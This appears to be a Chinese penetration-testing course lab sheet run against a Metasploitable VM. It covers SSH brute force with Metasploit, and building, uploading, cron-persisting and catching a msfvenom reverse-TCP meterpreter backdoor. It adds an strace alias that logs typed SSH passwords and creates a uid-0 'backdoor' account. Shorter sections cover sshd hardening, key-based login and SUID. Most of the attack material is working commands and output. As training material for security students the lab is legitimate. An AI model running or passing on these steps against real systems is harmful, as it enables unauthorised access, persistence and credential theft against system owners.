CASE

Top

1. SSH 爆破及安全配置
2. SSH 密钥连接
3. Msfvenom 后门练习
4. SSH keylogger
5. SUID 赋权

1 SSH 爆破及安全配置

1.1 问题

1）SSH 暴力破解

• 利用 MSF 查找 ssh_login 爆破脚本
• 设置脚本参数并尝试爆破 SSH 登录口令

2）SSH 安全配置

• 端口 12345，单次连接时长 1 分钟，禁止 root 登录
• 单次连接最大验证次数 2，最大会话数 4
• 新增白名单用户 kali，只允许从 192.168.10.1 访问

3）重启 SSH 服务并测试效果

1.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：SSH 暴力破解

1）利用 MSF 查找 ssh_login 爆破脚本。

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# msfconsole
3.  msf6 > search ssh_login
5.  Matching Modules
6.  ================
8.     #  Name                                    Disclosure Date  Rank    Check  Description
9.     -  \-\-\-\-                                    \-\-\-\-\-\-\-\-\-\-\-\-\-\-\-  \-\-\-\-    \-\-\-\-\-  \-\-\-\-\-\-\-\-\-\-\-
10.     0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
11.     1  auxiliary/scanner/ssh/ssh\_login\_pubkey                   normal  No     SSH Public Key Login Scanner

2）设置脚本参数并尝试爆破 SSH 登录口令。

1.  msf6 > use 0
2.  msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.10.143
3.  msf6 auxiliary(scanner/ssh/ssh_login) > set userpass_file /usr/share/wordlists/metasploit/piata\_ssh\_userpass.txt
4.  userpass_file => /usr/share/wordlists/metasploit/piata\_ssh\_userpass.txt
5.  msf6 auxiliary(scanner/ssh/ssh_login) > run
6.  +\] 192.168.10.143:22 - Success: 'user:user' 'uid=1001(user) gid=1001(user) groups=1001(user) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
7.  \[*\] Command shell session 3 opened (192.168.10.136:46581 -> 192.168.10.143:22) at 2021-03-25 21:33:28 +0800
8.  \[+\] 192.168.10.143:22 - Success: 'postgres:postgres' 'uid=108(postgres) gid=117(postgres) groups=114(ssl-cert),117(postgres) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
9.  \[*\] Command shell session 4 opened (192.168.10.136:36175 -> 192.168.10.143:22) at 2021-03-25 21:47:38 +0800
10.  \[+\] 192.168.10.143:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
11.  \[*\] Command shell session 3 opened (192.168.10.136:34197 -> 192.168.10.143:22) at 2021-03-26 00:09:44 +0800
12.  \[*\] Scanned 1 of 1 hosts (100% complete)
13.  \[*\] Auxiliary module execution completed
15.  msf6 auxiliary(scanner/ssh/ssh_login) > show  sessions
16.    1         shell linux  SSH user:user       192.168.10.136:40293 -> 192.168.10.143:22 
17.    2         shell linux  SSH postgres192.168.10.136:39071 -> 192.168.10.143:22
18.  msf6 auxiliary(scanner/ssh/ssh_login) > sessions 1
19.  whoami
20.  user

步骤二：SSH 安全配置

1）修改 SSH 配置文件

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# vim /etc/ssh/sshd_config   
3.  15  Port 12345                             
4.  33  LoginGraceTime 1m                       
5.  34  PermitRootLogin no                      
6.  36  MaxAuthTries 2                           
7.  37  MaxSessions 4                                 
8.  AllowUsers  kali@192.168.10.1

2）重启 SSH 服务

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# systemctl restart ssh

2 SSH 密钥连接

2.1 问题

配置密钥对访问 SSH。

• 利用 MobaXterm 配置密钥对
• 将公钥传输到 kali 主机
• 调整 kali 主机的 SSH 配置，禁止使用密码登录

2.2 步骤

配置密钥对访问 SSH，实现此案例需要按照如下步骤进行。

1）利用 MobaXterm 配置密钥对

1.  \[Administrator.SC-201908041746\] ➤ ssh-keygen        
2.  Enter file in which to save the key (/home/mobaxterm/.ssh/id_rsa):输入文件名(默认)
3.  Enter passphrase (empty for no passphrase):    输入私钥密码
4.  Enter same passphrase again:确认密码

2）将公钥传输到 KALI 主机

1.  ssh-copy-id kali@192.168.10.136
2.  ssh  kali@192.168.10.136 不再需要使用密码
3.  cat  .ssh/authorized_keys 查看公钥

3）修改 SSH 配置文件，禁止使用密码登录

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# vim /etc/ssh/sshd_config
3.  58  PasswordAuthentication no            
4.  \# systemctl restart ssh

3 Msfvenom 后门练习

3.1 问题

1）Msfvenom 后门练习

• 创建后门 Payload
• 将 Payload 上传至目标主机 /tmp 目录
• 通过计划任务在目标主机运行 Payload
• 在 MSF 中运行监听脚本，接受后门连接

2）利用 Linux 计划任务自动运行 Payload

• 在目标主机创建计划任务
• 检查 MSF 会话

3）利用 sshd 创建后门

• 创建 sshd 的连接到 /tmp 目录，监听 5555 端口
• 使用 ssh 进行连接

4）使用 SSH keylogger 记录 SSH 输入

• 创建 SSH 命令别名
• 记录 SSH 连接密码
• 创建后门管理员用户

3.2 步骤

Msfvenom 后门生成，实现此案例需要按照如下步骤进行。

1）查看 msfvenom 中 Linux 包含的 Payload

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# msfvenom -l all | grep linux | grep x86 | grep tcp
3.      linux/x86/meterpreter/bind\_ipv6\_tcp                 Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)
4.      linux/x86/meterpreter/bind\_ipv6\_tcp_uuid            Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
5.      linux/x86/meterpreter/bind\_nonx\_tcp                 Inject the mettle server payload (staged). Listen for a connection
6.      linux/x86/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection (Linux x86)
7.      linux/x86/meterpreter/bind\_tcp\_uuid                 Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)
8.      linux/x86/meterpreter/reverse\_ipv6\_tcp              Inject the mettle server payload (staged). Connect back to attacker over IPv6
9.      linux/x86/meterpreter/reverse\_nonx\_tcp              Inject the mettle server payload (staged). Connect back to the attacker
10.      linux/x86/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
11.      linux/x86/meterpreter/reverse\_tcp\_uuid              Inject the mettle server payload (staged). Connect back to the attacker
12.      linux/x86/meterpreter\_reverse\_tcp                   Run the Meterpreter / Mettle server payload (stageless)
13.      linux/x86/metsvc\_bind\_tcp                           Stub payload for interacting with a Meterpreter Service
14.      linux/x86/metsvc\_reverse\_tcp                        Stub payload for interacting with a Meterpreter Service
15.      linux/x86/shell/bind\_ipv6\_tcp                       Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)
16.      linux/x86/shell/bind\_ipv6\_tcp_uuid                  Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
17.      linux/x86/shell/bind\_nonx\_tcp                       Spawn a command shell (staged). Listen for a connection
18.      linux/x86/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection (Linux x86)
19.      linux/x86/shell/bind\_tcp\_uuid                       Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)
20.      linux/x86/shell/reverse\_ipv6\_tcp                    Spawn a command shell (staged). Connect back to attacker over IPv6
21.      linux/x86/shell/reverse\_nonx\_tcp                    Spawn a command shell (staged). Connect back to the attacker
22.      linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
23.      linux/x86/shell/reverse\_tcp\_uuid                    Spawn a command shell (staged). Connect back to the attacker
24.      linux/x86/shell\_bind\_ipv6_tcp                       Listen for a connection over IPv6 and spawn a command shell
25.      linux/x86/shell\_bind\_tcp                            Listen for a connection and spawn a command shell
26.      linux/x86/shell\_bind\_tcp\_random\_port                Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
27.      linux/x86/shell\_reverse\_tcp                         Connect back to attacker and spawn a command shell
28.      linux/x86/shell\_reverse\_tcp_ipv6                    Connect back to attacker and spawn a command shell over IPv6

2）创建后门 Payload

1.  msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.136 lport=4444  -f elf -o shell
2.  \[-\] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
3.  \[-\] No arch selected, selecting arch: x86 from the payload
4.  No encoder specified, outputting raw payload
5.  Payload size: 123 bytes
6.  Final size of elf file: 207 bytes
7.  Saved as: shell

3）将 Payload 上传至目标主机 /tmp 目录

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# scp shell msfadmin@192.168.10.143:/tmp
3.  msfadmin@192.168.10.143's password: 
4.  shell                                                                         100%  207   500.5KB/s   00:00

4）在目标主机运行 Payload

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─# ssh msfadmin@192.168.10.143           
3.  msfadmin@192.168.10.143's password: msfadmin
5.  msfadmin@metasploitable:~$ ls /tmp/
6.  5156.jsvc_up  open.txt  shell  time.txt
7.  msfadmin@metasploitable:~$ chmod +x /tmp/shell 
8.  msfadmin@metasploitable:~$ /tmp/shell &

5）在 MSF 中运行监听脚本，接受后门连接

1.  msf6 > use exploit/multi/handler 
2.  \[*\] Using configured payload generic/shell\_reverse\_tcp
3.  msf6 exploit(multi/handler) > set lhost 192.168.10.136
4.  lhost => 192.168.10.136
5.  msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
6.  payload => linux/x86/meterpreter/reverse_tcp
7.  msf6 exploit(multi/handler) > run
9.  \[*\] Started reverse TCP handler on 192.168.10.136:4444 
10.  \[*\] Sending stage (980808 bytes) to 192.168.10.143
11.  \[*\] Meterpreter session 4 opened (192.168.10.136:4444 -> 192.168.10.143:36195) at 2021-04-25 16:16:16 +0800
13.  meterpreter > getuid 
14.  Server username: msfadmin @ metasploitable (uid=1000, gid=1000, euid=1000, egid=1000)
15.  meterpreter > shell
16.  Process 8287 created.
17.  Channel 1 created.
18.  whoami 
19.  msfadmin

步骤二：利用 Linux 计划任务自动运行 Payload

1）在目标主机创建计划任务。

1.  msfadmin@metasploitable:~$ EDITOR=vi crontab -e
2.  *  *  *  *  *  /tmp/shell

2）检查 MSF 会话。

1.  meterpreter >background
2.  msf6 exploit(multi/handler) > sessions 
3.  10        meterpreter x86/linux  msfadmin @ metasploitable
4.  (uid=1000, gid=1000, euid=1000, egid=1000) @ metasp...  
5.  192.168.10.136:4444 -> 192.168.10.143:59702 (192.168.10.143)

4 SSH keylogger

4.1 问题

1）使用 SSH keylogger 记录 SSH 输入

• 创建 SSH 命令别名
• 记录 SSH 连接密码

2）创建后门管理员用户

4.2 步骤

使用 SSH keylogger 记录 SSH 输入，实现此案例需要按照如下步骤进行成。

步骤一：创建 SSH 命令别名

1.  msfadmin@metasploitable:~$ vi .bashrc            
2.  \# 新增一行 
3.  alias ssh="strace -o /tmp/sshpwd-$(date    '+%F-%s').log -e read,write,connect  -s2048 ssh"
4.  msfadmin@metasploitable:~$ source .bashrc

步骤二：使用 SSH 连接本机 root，抓取 ssh 输入

1.  root@metasploitable:~\# ssh msfadmin@127.0.0.1
2.  msfadmin@127.0.0.1's password:  msfadmin
4.  root@metasploitable:~# ls /tmp/
5.  jsvc_up  sshpwd-29Mar031617026026.log
7.  msfadmin@metasploitable:~$ cat -n /tmp/sshpwd-25Apr041619343426.log
8.   88 write(4, "root@192.168.10.143\\'s password: ", 32) = 32
9.   89 read(4, "1", 1)                         = 1
10.   90 read(4, "2", 1)                         = 1
11.   91 read(4, "3", 1)                         = 1
12.   92 read(4, "4", 1)                         = 1
13.   93 read(4, "5", 1)                         = 1
14.   94 read(4, "6", 1)                         = 1
15.   95 read(4, "\\n", 1)                        = 1
16.   96 write(4, "\\n", 1)                       = 1

步骤三：创建后门管理员用户 backdoor

useradd：-u 指定 uid，-g 指定 gid，-o 允许 id 重复，-d 指定家目录

1.  root@metasploitable:~\# useradd -u 0 -g 0 -d /root  -o backdoor
2.  root@metasploitable:~\# echo "backdoor:123456" | chpasswd      
3.  root@metasploitable:~\# su - backdoor
4.  root@metasploitable:~\# whoami 
5.  root
6.  root@metasploitable:~\# id backdoor
7.  uid=0(root) gid=0(root) groups=0(root)

5 SUID 赋权

5.1 问题

1）检测无 SUID 权限的效果

• 复制 cp 命令为 mycp
• 使用 mycp 命令将 /etc/passwd 拷贝到当前目录
• 检查 当前目录下 passwd 的文件权限

2）检测有 SUID 权限的效果

• 对 mycp 赋予 s 权限
• 使用 mycp /etc/passwd 拷贝到当前目录（改名为 passwd-new）
• 再次检查文件权限

5.2 步骤

实现此案例需要按照如下步骤进行。

步骤一：检测无 SUID 权限的效果

1）复制 cp 命令为 mycp，检查文件权限

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─#cp /usr/bin/cp /usr/bin/mycp 
4.  ┌──(root@localhost)-\[~/桌面\]
5.  └─#ls -l /usr/bin/mycp                                    
6.  -rwxr-xr-x 1 root root 151168  4月 19 03:18  /usr/bin/mycp

2）切换 kali 用户，使用 mycp 复制文件

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─#su - kali 
4.  ┌──(root@localhost)-\[~/桌面\]
5.  └─#mycp /etc/passwd  passwd

3）检查文件属主

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─#ls -l passwd 
3.  -rw-r--r-- 1 kali kali 3143  4月 19 03:18 passwd

步骤二：检测有 SUID 权限的效果

1）为 mycp 赋予 s 权限

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─#chmod u+s /usr/bin/mycp  
4.  ┌──(root@localhost)-\[~/桌面\]
5.  └─#ls -l /usr/bin/mycp                                    
6.  -rwsr-xr-x 1 root root 151168  4月 19 03:18  /usr/bin/mycp

2）切换 kali 用户，使用 mycp 复制文件

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─#su - kali 
4.  ┌──(root@localhost)-\[~/桌面\]
5.  └─#mycp /etc/passwd  passwd-new

3）检查文件属主

1.  ┌──(root@localhost)-\[~/桌面\]
2.  └─#ls -l passwd-new 
3.  -rw-r--r-- 1 root kali 3143  4月 19 03:18 passwd

https://tts.tmooc.cn/ttsPage/NTD/NTDTN202109/PENTEST/DAY04/CASE/01/index.html